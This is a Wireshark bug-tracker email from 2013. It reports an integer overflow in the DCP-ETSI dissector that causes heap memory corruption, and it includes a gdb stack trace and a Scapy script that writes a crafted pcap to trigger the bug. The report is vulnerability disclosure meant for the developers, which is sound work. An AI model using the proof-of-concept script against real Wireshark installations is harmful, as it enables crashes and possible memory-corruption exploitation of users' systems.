Wireshark-bugs: [Wireshark-bugs] [Bug 8541] New: Integer Overflow -> Memory Corruption (arbitrar

Date: Fri, 29 Mar 2013 18:44:56 +0000
Bug ID 8541
Summary Integer Overflow -> Memory Corruption (arbitrary read) packet-dcp-etsi.c
Classification Unclassified
Product Wireshark
Version 1.8.6
Hardware x86
OS All
Status UNCONFIRMED
Severity Major
Priority Low
Component Dissection engine (libwireshark)
Assignee [email protected]
Reporter [email protected]

Created attachment 10505 [details]
pcap that will corrupt heap memory.

Build Information:

--
By overflowing an integer to g_malloc we can cause heap memory to be corrupted
resulting in arbitrary reads and arbitrary writes.


Stack Trace:
#0  0x00007ffff1cdee3a in g_slice_alloc () from
/lib/x86_64-linux-gnu/libglib-2.0.so.0
#1  0x00007ffff4b4d66a in tvb_new (type=TVBUFF_REAL_DATA) at tvbuff.c:115
#2  0x00007ffff4b4dea9 in tvb_new_real_data (data="" 'A' <repeats 200
times>..., length=256, reported_length=256)
    at tvbuff.c:259
#3  0x00007ffff4b4deff in tvb_new_child_real_data (parent=0x1cacc00,
data="" 'A' <repeats 200 times>..., length=256, 
    reported_length=256) at tvbuff.c:274
#4  0x00007ffff4d91620 in dissect_pft_fec_detailed (tvb=0x1cacc00,
pinfo=0x7fffffffd960, tree=0x0, findex=255, fcount=256, 
    seq=9156, offset=20, plen=257, fec=1, rsk=255, rsz=71, fdx=0x1c63e30) at
packet-dcp-etsi.c:353
#5  0x00007ffff4d91824 in dissect_pft_fragmented (tvb=0x1cacc00,
pinfo=0x7fffffffd960, tree=0x0, findex=255, fcount=256, seq=9156, 
    offset=20, plen=257, fec=1, rsk=255, rsz=71) at packet-dcp-etsi.c:411
#6  0x00007ffff4d91e61 in dissect_pft (tvb=0x1cacc00, pinfo=0x7fffffffd960,
tree=0x0) at packet-dcp-etsi.c:525
#7  0x00007ffff4b0d92a in call_dissector_through_handle (handle=0x1851530,
tvb=0x1cacc00, pinfo=0x7fffffffd960, tree=0x0)
    at packet.c:433
#8  0x00007ffff4b0daf7 in call_dissector_work (handle=0x1851530, tvb=0x1cacc00,
pinfo_arg=0x7fffffffd960, tree=0x0, 
    add_proto_name=1) at packet.c:524
#9  0x00007ffff4b0e8f9 in dissector_try_string (sub_dissectors=0xbd1310,
string=0x7fffe1ae40a8 "PF", tvb=0x1cacc00, 
    pinfo=0x7fffffffd960, tree=0x0) at packet.c:1202
#10 0x00007ffff4d90f95 in dissect_dcp_etsi (tvb=0x1cacc00,
pinfo=0x7fffffffd960, tree=0x0) at packet-dcp-etsi.c:200
#11 0x00007ffff4b0f5cd in dissector_try_heuristic (sub_dissectors=0x976370,
tvb=0x1cacc00, pinfo=0x7fffffffd960, tree=0x0)
    at packet.c:1733

(gdb) x /i $rip
=> 0x7ffff1cdee3a <g_slice_alloc+490>:    mov    (%rbx),%rdx
(gdb) i r rbx
rbx            0x4141414141414141    4702111234474983745 (lololol)


Script:
from scapy.all import *
from struct import pack
packets=[]
top=IP(dst='127.0.0.1')/UDP(dport=55935,sport=42404)
for i in range(0,0x100):
    packets.append(top/(pack(">HHBHBBBHBBH",0x5046,0x23c4, 0x00,i,
0x00,0x01,0x00,  0xffff, 0xff,0x47, 0x4547)+'A'*0x105))



wrpcap('lol.pcap',packets)


You are receiving this mail because:
  • You are watching all bug changes.